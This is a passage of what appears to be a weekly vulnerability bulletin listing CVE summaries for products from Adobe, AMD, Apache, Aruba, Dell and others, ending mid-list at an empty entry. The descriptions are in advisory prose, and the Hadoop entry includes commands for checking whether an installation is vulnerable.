adobe — coldfusion Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to impact a minor integrity feature. Exploitation of this issue does require user interaction. 2023-11-17 not yet calculated CVE-2023-44355
adobe — css-tools @adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a minor denial of service while attempting to parse CSS. Exploitation of this issue does not require user interaction or privileges. 2023-11-17 not yet calculated CVE-2023-26364
adobe — dimension Adobe Dimension versions 3.4.9 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-44326
adobe — framemaker Adobe FrameMaker versions 2022 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An unauthenticated attacker can abuse this vulnerability to access the API and leak default admin’s password. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-44324
adobe — incopy Adobe InCopy versions 18.5 (and earlier) and 17.4.2 (and earlier) are affected by are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-26368
adobe — media_encoder Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47040
adobe — media_encoder Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47041
adobe — media_encoder Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47042
adobe — media_encoder Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47043
adobe — media_encoder Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47044
adobe — photoshop Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44330
adobe — photoshop Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44331
adobe — photoshop Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44332
adobe — photoshop Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44333
adobe — photoshop Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44334
adobe — photoshop Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44335
adobe — premiere_pro Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47056
adobe — premiere_pro Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47055
adobe — premiere_pro Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47057
adobe — premiere_pro Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47058
adobe — premiere_pro Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47059
adobe — premiere_pro Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47060
aio-libs — aiohttp aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. The HTTP parser in AIOHTTP has numerous problems with header parsing, which could lead to request smuggling. This parser is only used when AIOHTTP_NO_EXTENSIONS is enabled (or not using a prebuilt wheel). These bugs have been addressed in commit `d5c12ba89` which has been included in release version 3.8.6. Users are advised to upgrade. There are no known workarounds for these issues. 2023-11-14 not yet calculated CVE-2023-47627
 
aio-libs — aiohttp aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Affected versions of aiohttp have a security vulnerability regarding the inconsistent interpretation of the http protocol. HTTP/1.1 is a persistent protocol, if both Content-Length(CL) and Transfer-Encoding(TE) header values are present it can lead to incorrect interpretation of two entities that parse the HTTP and we can poison other sockets with this incorrect interpretation. A possible Proof-of-Concept (POC) would be a configuration with a reverse proxy(frontend) that accepts both CL and TE headers and aiohttp as backend. As aiohttp parses anything with chunked, we can pass a chunked123 as TE, the frontend entity will ignore this header and will parse Content-Length. The impact of this vulnerability is that it is possible to bypass any proxy rule, poisoning sockets to other users like passing Authentication Headers, also if it is present an Open Redirect an attacker could combine it to redirect random users to another website and log the request. This vulnerability has been addressed in release 3.8.0 of aiohttp. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47641
 
amd — asp Improper address validation in ASP with SNP enabled may potentially allow an attacker to compromise guest memory integrity. 2023-11-14 not yet calculated CVE-2023-20566
amd — asp_bootloader TOCTOU in the ASP Bootloader may allow an attacker with physical access to tamper with SPI ROM records after memory content verification, potentially leading to loss of confidentiality or a denial of service. 2023-11-14 not yet calculated CVE-2023-20521
 
amd — asp_bootloader Insufficient input validation in the ASP Bootloader may enable a privileged attacker with physical access to expose the contents of ASP memory potentially leading to a loss of confidentiality. 2023-11-14 not yet calculated CVE-2023-20526
 
amd — cpu Improper or unexpected behavior of the INVD instruction in some AMD CPUs may allow an attacker with a malicious hypervisor to affect cache line write-back behavior of the CPU leading to a potential loss of guest virtual machine (VM) memory integrity. 2023-11-14 not yet calculated CVE-2023-20592
amd — epyc(tm)_processors
 
A Use-After-Free vulnerability in the management of an SNP guest context page may allow a malicious hypervisor to masquerade as the guest’s migration agent resulting in a potential loss of guest integrity. 2023-11-14 not yet calculated CVE-2023-20519
amd — multiple_products
 
Improper clearing of sensitive data in the ASP Bootloader may expose secret keys to a privileged attacker accessing ASP SRAM, potentially leading to a loss of confidentiality. 2023-11-14 not yet calculated CVE-2021-46766
 
amd — multiple_products
 
Insufficient DRAM address validation in System Management Unit (SMU) may allow an attacker to read/write from/to an invalid DRAM address, potentially resulting in denial-of-service. 2023-11-14 not yet calculated CVE-2021-46774
 
amd — multiple_products
 
Failure to validate the AMD SMM communication buffer may allow an attacker to corrupt the SMRAM potentially leading to arbitrary code execution. 2023-11-14 not yet calculated CVE-2022-23820
 
amd — multiple_products
 
Improper access control in System Management Mode (SMM) may allow an attacker to write to SPI ROM potentially leading to arbitrary code execution. 2023-11-14 not yet calculated CVE-2022-23821
amd — multiple_products
 
SMM configuration may not be immutable, as intended, when SNP is enabled resulting in a potential limited loss of guest memory integrity. 2023-11-14 not yet calculated CVE-2022-23830
amd — radeon(tm)
 
Insufficient bounds checking in the ASP (AMD Secure Processor) may allow an attacker to access memory outside the bounds of what is permissible to a TA (Trusted Application) resulting in a potential denial of service. 2023-11-14 not yet calculated CVE-2021-46748
 
amd — radeon(tm)
 
Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service. 2023-11-14 not yet calculated CVE-2023-31320
amd — raedomtm_rx_vega_m_graphics_driver Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch AMDSoftwareInstaller.exe without validating the file signature potentially leading to arbitrary code execution. 2023-11-14 not yet calculated CVE-2023-20567
 
amd — raedomtm_rx_vega_m_graphics_driver Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch RadeonInstaller.exe without validating the file signature potentially leading to arbitrary code execution. 2023-11-14 not yet calculated CVE-2023-20568
 
amd — ryzen(tm)
 
Insufficient validation of SPI flash addresses in the ASP (AMD Secure Processor) bootloader may allow an attacker to read data in memory mapped beyond SPI flash resulting in a potential loss of availability and integrity. 2023-11-14 not yet calculated CVE-2021-46758
amd — system_management_mode Insufficient protections in System Management Mode (SMM) code may allow an attacker to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-20563
amd — system_management_mode Insufficient protections in System Management Mode (SMM) code may allow an attacker to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-20565
amd — system_management_mode A race condition in System Management Mode (SMM) code may allow an attacker using a compromised user space to leverage CVE-2018-8897 potentially resulting in privilege escalation. 2023-11-14 not yet calculated CVE-2023-20571
amd — system_management_mode Improper input validation in the SMM Supervisor may allow an attacker with a compromised SMI handler to gain Ring0 access potentially leading to arbitrary code execution. 2023-11-14 not yet calculated CVE-2023-20596
amd — system_management_unit Insufficient DRAM address validation in System Management Unit (SMU) may allow an attacker to read/write from/to an invalid DRAM address, potentially resulting in denial-of-service. 2023-11-14 not yet calculated CVE-2023-20533
 
ami — aptiov AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity and availability. 2023-11-14 not yet calculated CVE-2023-39535
ami — aptiov AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity and availability. 2023-11-14 not yet calculated CVE-2023-39536
ami — aptiov AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity and availability. 2023-11-14 not yet calculated CVE-2023-39537
apache — airflow Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. This is a different issue than CVE-2023-42663 but leading to similar outcome. Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability. 2023-11-12 not yet calculated CVE-2023-42781

 

apache — airflow We failed to apply CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then. Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. Users should upgrade to version 2.7.3 or later which has removed the vulnerability. 2023-11-12 not yet calculated CVE-2023-47037

 

apache — hadoop
 
Relative library resolution in Linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges. Hadoop 3.3.0 updated the ” YARN Secure Containers https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html ” to add a feature for executing user-submitted applications in isolated Linux containers. The native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs. The patch ” YARN-10495 https://issues.apache.org/jira/browse/YARN-10495 . make the rpath of container-executor configurable” modified the library loading path for loading .so files from “$ORIGIN/” to “”$ORIGIN/:../lib/native/”. This is the path through which libcrypto.so is located. Thus, it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root. If the YARN cluster is accepting work from remote (authenticated) users, and these users’ submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges. The fix for the vulnerability is to revert the change, which is done in YARN-11441 https://issues.apache.org/jira/browse/YARN-11441 , “Revert YARN-10495”. This patch is in hadoop-3.3.5. To determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path “./lib/native/” then it is at risk $ readelf -d container-executor|grep ‘RUNPATH|RPATH’ 0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/:../lib/native/] If it does not, then it is safe: $ readelf -d container-executor|grep ‘RUNPATH|RPATH’ 0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/] For an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set $ ls -laF /opt/hadoop/bin/container-executor —Sr-s—. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor A safe installation lacks the suid bit; ideally is also not owned by root. $ ls -laF /opt/hadoop/bin/container-executor -rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor This configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work. 2023-11-16 not yet calculated CVE-2023-26031

 

archery — archery
 
Archery v1.10.0 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. This vulnerability can lead to the disclosure of information and communications. 2023-11-16 not yet calculated CVE-2023-48053
aruba — airwave_client_service There is a buffer overflow vulnerability in the underlying AirWave client service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba’s access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. 2023-11-14 not yet calculated CVE-2023-45616
aruba — airwave_client_service There are arbitrary file deletion vulnerabilities in the AirWave client service accessed by PAPI (Aruba’s access point management protocol). Successful exploitation of these vulnerabilities results in the ability to delete arbitrary files on the underlying operating system, which could lead to the ability to interrupt normal operation and impact the integrity of the access point. 2023-11-14 not yet calculated CVE-2023-45618
aruba — ble_daemon_service Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the BLE daemon service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities results in the ability to interrupt the normal operation of the affected access point. 2023-11-14 not yet calculated CVE-2023-45622
aruba — cli_service There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba’s access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system. 2023-11-14 not yet calculated CVE-2023-45614
aruba — cli_service There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba’s access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system. 2023-11-14 not yet calculated CVE-2023-45615
aruba — cli_service There are arbitrary file deletion vulnerabilities in the CLI service accessed by PAPI (Aruba’s access point management protocol). Successful exploitation of these vulnerabilities results in the ability to delete arbitrary files on the underlying operating system, which could lead to the ability to interrupt normal operation and impact the integrity of the access point. 2023-11-14 not yet calculated CVE-2023-45617
aruba — cli_service Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities results in the ability to interrupt the normal operation of the affected access point. 2023-11-14 not yet calculated CVE-2023-45620
aruba — cli_service Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities results in the ability to interrupt the normal operation of the affected access point. 2023-11-14 not yet calculated CVE-2023-45621
aruba — cli_service Multiple authenticated command injection vulnerabilities exist in the command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system. 2023-11-14 not yet calculated CVE-2023-45625
aruba — cli_service An authenticated Denial-of-Service (DoS) vulnerability exists in the CLI service. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected access point. 2023-11-14 not yet calculated CVE-2023-45627
aruba — rssi_service There is an arbitrary file deletion vulnerability in the RSSI service accessed by PAPI (Aruba’s access point management protocol). Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to the ability to interrupt normal operation and impact the integrity of the access point. 2023-11-14 not yet calculated CVE-2023-45619
aruba — soft_ap_daemon An unauthenticated Denial-of-Service (DoS) vulnerability exists in the soft ap daemon accessed via the PAPI protocol. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected access point. 2023-11-14 not yet calculated CVE-2023-45624
aruba — wi-fi_uplink_service Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the Wi-Fi Uplink service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities results in the ability to interrupt the normal operation of the affected access point. 2023-11-14 not yet calculated CVE-2023-45623
asp.net — core ASP.NET Core Denial of Service Vulnerability 2023-11-14 not yet calculated CVE-2023-36038
asustek_computer_inc. — rt-ac87u
 
An improper access control vulnerability exists in RT-AC87U all versions. An attacker may read or write files that are not intended to be accessed by connecting to a target device via tftp. 2023-11-15 not yet calculated CVE-2023-47678

 

autel_robotics — evo_nano_drone
 
Insecure permissions in the setNFZEnable function of Autel Robotics EVO Nano drone v1.6.5 allows attackers to breach the geo-fence and fly into no-fly zones. 2023-11-16 not yet calculated CVE-2023-47335
automation_hub — automation_hub
 
A path traversal vulnerability exists in Ansible when extracting tarballs. An attacker could craft a malicious tarball so that when using the galaxy importer of Ansible Automation Hub, a symlink could be dropped on the disk, resulting in files being overwritten. 2023-11-14 not yet calculated CVE-2023-5189
 
aveva — operations_control_logger This external control vulnerability, if exploited, could allow a local OS-authenticated user with standard privileges to delete files with System privilege on the machine where these products are installed, resulting in denial of service. 2023-11-15 not yet calculated CVE-2023-34982
 
aveva — operations_control_logger This privilege escalation vulnerability, if exploited, cloud allow a local OS-authenticated user with standard privileges to escalate to System privilege on the machine where these products are installed, resulting in complete compromise of the target machine. 2023-11-15 not yet calculated CVE-2023-33873
 
aweber — aweber
 
Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in AWeber AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth allows Accessing Functionality Not Properly Constrained by ACLs, Cross-Site Request Forgery.This issue affects AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth: from n/a through 7.3.9. 2023-11-17 not yet calculated CVE-2023-47757
azure — cli_rest Azure CLI REST Command Information Disclosure Vulnerability 2023-11-14 not yet calculated CVE-2023-36052
azure — devops_server Azure DevOps Server Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36437
bell — homehub_3000
 
An issue was discovered on Bell HomeHub 3000 SG48222070 devices. Remote authenticated users can retrieve the serial number via cgi/json-req – this is an information leak because the serial number is intended to prove an actor’s physical access to the device. 2023-11-17 not yet calculated CVE-2020-11447
 
bell — homehub_3000
 
An issue was discovered on Bell HomeHub 3000 SG48222070 devices. There is XSS related to the email field and the login page. 2023-11-17 not yet calculated CVE-2020-11448
 
blackberry — qnx_software_development_platform Improper Input Validation in the Networking Stack of QNX SDP version(s) 6.6, 7.0, and 7.1 could allow an attacker to potentially cause Information Disclosure or a Denial-of-Service condition. 2023-11-14 not yet calculated CVE-2023-32701
cesiumjs — cesiumjs
 
A cross-site scripting (XSS) vulnerability in CesiumJS v1.111 allows attackers to execute arbitrary code in the context of the victim’s browser via sending a crafted payload to /container_files/public_html/doc/index.html. 2023-11-14 not yet calculated CVE-2023-48094
checkmk_gmbh — checkmk
 
Improper Input Validation in Checkmk <2.2.0p15, <2.1.0p37, <=2.0.0p39 allows privileged attackers to cause partial denial of service of the UI via too long hostnames. 2023-11-15 not yet calculated CVE-2023-23549
cksource — ckeditor
 
A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /ckeditor/samples/old/ajax.html file and retrieve an authorized user’s information. 2023-11-16 not yet calculated CVE-2023-4771
click_studios — passwordstate
 
An issue was discovered in Click Studios Passwordstate before 9811. Existing users (Security Administrators) could use the System Wide API Key to read or delete private password records when specifically used with the PasswordHistory API endpoint. It is also possible to use the Copy/Move Password Record API Key to Copy/Move private password records. 2023-11-13 not yet calculated CVE-2023-47801
code-projects — blood_bank SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the ‘bid’ parameter. 2023-11-14 not yet calculated CVE-2023-46022
color — demoiccmax
 
In International Color Consortium DemoIccMAX 3e7948b, CIccCLUT::Interp2d in IccTagLut.cpp in libSampleICC.a has an out-of-bounds read. 2023-11-18 not yet calculated CVE-2023-48736
concrete_cms — concrete_cms
 
Concrete CMS before 8.5.13 and 9.x before 9.2.2 allows unauthorized access because directories can be created with insecure permissions. File creation functions (such as the Mkdir() function) gives universal access (0777) to created folders by default. Excessive permissions can be granted when creating a directory with permissions greater than 0755 or when the permissions argument is not specified. 2023-11-17 not yet calculated CVE-2023-48648

 

concrete_cms — concrete_cms
 
Concrete CMS before 8.5.13 and 9.x before 9.2.2 allows stored XSS on the Admin page via an uploaded file name. 2023-11-17 not yet calculated CVE-2023-48649

 

corebos — corebos
 
Corebos 8.0 and below is vulnerable to CSV Injection. An attacker with low privileges can inject a malicious command into a table. This vulnerability is exploited when an administrator visits the user management section, exports the data to a CSV file, and then opens it, leading to the execution of the malicious payload on the administrator’s computer. 2023-11-17 not yet calculated CVE-2023-48029
 
crushftp — crushftp CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. 2023-11-18 not yet calculated CVE-2023-43177
 
cubecart — cubecart Cross-site request forgery (CSRF) vulnerability in CubeCart prior to 6.5.3 allows a remote unauthenticated attacker to delete data in the system. 2023-11-17 not yet calculated CVE-2023-38130
 
cubecart_limited — cubecart
 
Directory traversal vulnerability in CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to obtain files in the system. 2023-11-17 not yet calculated CVE-2023-47283
 
cubecart_limited — cubecart
 
CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command. 2023-11-17 not yet calculated CVE-2023-47675
 
cubecart — cubecart Directory traversal vulnerability in CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to delete directories and files in the system. 2023-11-17 not yet calculated CVE-2023-42428
 
datahub — datahub
 
DataHub is an open-source metadata platform. DataHub Frontend’s sessions are configured using Play Framework’s default settings for stateless session which do not set an expiration time for a cookie. Due to this, if a session cookie were ever leaked, it would be valid forever. DataHub uses a stateless session cookie that is not invalidated on logout, it is just removed from the browser forcing the user to login again. However, if an attacker extracted a cookie from an authenticated user it would continue to be valid as there is no validation on a time window the session token is valid for due to a combination of the usage of LegacyCookiesModule from Play Framework and using default settings which do not set an expiration time. All DataHub instances prior to the patch that have removed the datahub user, but not the default policies applying to that user are affected. Users are advised to update to version 0.12.1 which addresses the issue. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47628
datahub — datahub
 
DataHub is an open-source metadata platform. In affected versions sign-up through an invite link does not properly restrict users from signing up as privileged accounts. If a user is given an email sign-up link they can potentially create an admin account given certain preconditions. If the default datahub user has been removed, then the user can sign up for an account that leverages the default policies giving admin privileges to the datahub user. All DataHub instances prior to the patch that have removed the datahub user, but not the default policies applying to that user are affected. Users are advised to update to version 0.12.1 which addresses the issue. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47629
datahub — datahub
 
DataHub is an open-source metadata platform. The HMAC signature for DataHub Frontend sessions was being signed using a SHA-1 HMAC with the frontend secret key. SHA1 with a 10-byte key can be brute forced using sufficient resources (i.e. state level actors with large computational capabilities). DataHub Frontend was utilizing the Play LegacyCookiesModule with default settings which utilizes a SHA1 HMAC for signing. This is compounded by using a shorter key length than recommended by default for the signing key for the randomized secret value. An authenticated attacker (or attacker who has otherwise obtained a session token) could crack the signing key for DataHub and obtain escalated privileges by generating a privileged session cookie. Due to key length being a part of the risk, deployments should update to the latest helm chart and rotate their session signing secret. All deployments using the default helm chart configurations for generating the Play secret key used for signing are affected by this vulnerability. Version 0.11.1 resolves this vulnerability. All users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47640
dedecms — dedecms Cross-Site Request Forgery (CSRF) vulnerability in DedeCMS v5.7 in 110 backend management interface via /catalog_add.php, allows attackers to create crafted web pages due to a lack of verification of the token value of the submitted form. 2023-11-16 not yet calculated CVE-2023-43275
dell — elab-navigator Dell ELab-Navigator, version 3.1.9 contains a hard-coded credential vulnerability. A local attacker could potentially exploit this vulnerability, leading to unauthorized access to sensitive data. Successful exploitation may result in the compromise of confidential user information. 2023-11-16 not yet calculated CVE-2023-44296
dell — multiple_products Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server version prior to 11.8.1 contain an Insecure Operation on Windows Junction Vulnerability during installation. A local malicious user could potentially exploit this vulnerability to create an arbitrary folder inside a restricted directory, leading to Privilege Escalation 2023-11-16 not yet calculated CVE-2023-39246
dell — os_recovery_tool Dell OS Recovery Tool, versions 2.2.4013, 2.3.7012.0, and 2.3.7515.0 contain an Improper Access Control Vulnerability. A local authenticated non-administrator user could potentially exploit this vulnerability, leading to the elevation of privilege on the system. 2023-11-16 not yet calculated CVE-2023-39259
dell — precision_tower_bios Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution. 2023-11-16 not yet calculated CVE-2023-32469
dell — repository_manager Dell Repository Manager, 3.4.3 and prior, contains an Improper Access Control vulnerability in its installation module. A local low-privileged attacker could potentially exploit this vulnerability, leading to gaining escalated privileges. 2023-11-16 not yet calculated CVE-2023-44282
dell — repository_manager Dell Repository Manager, 3.4.3 and prior, contains an Improper Access Control vulnerability in its installation module. A local low-privileged attacker could potentially exploit this vulnerability, leading to gaining escalated privileges. 2023-11-16 not yet calculated CVE-2023-44292
dreamer_cms — dreamer_cms
 
Dreamer_cms 4.1.3 is vulnerable to Cross Site Request Forgery (CSRF) via Add permissions to CSRF in Permission Management. 2023-11-18 not yet calculated CVE-2023-48017
eclipse_foundation — openj9
 
In Eclipse OpenJ9 before version 0.41.0, the JVM can be forced into an infinite busy hang on a spinlock or a segmentation fault if a shutdown signal (SIGTERM, SIGINT or SIGHUP) is received before the JVM has finished initializing. 2023-11-15 not yet calculated CVE-2023-5676
 
elastic — logstash An issue was identified by Elastic whereby sensitive information is recorded in Logstash logs under specific circumstances. The prerequisites for the manifestation of this issue are: * Logstash is configured to log in JSON format https://www.elastic.co/guide/en/logstash/current/running-logstash-command-line.html , which is not the default logging format. * Sensitive data is stored in the Logstash keystore and referenced as a variable in Logstash configuration. 2023-11-15 not yet calculated CVE-2023-46672
 
elecom — multiple_products OS command injection vulnerability in WRC-X3000GS2-W v1.05 and earlier, WRC-X3000GS2-B v1.05 and earlier, and WRC-X3000GS2A-B v1.05 and earlier allows a network-adjacent authenticated user to execute an arbitrary OS command by sending a specially crafted request. 2023-11-16 not yet calculated CVE-2023-43752
 
ethyca — fides
 
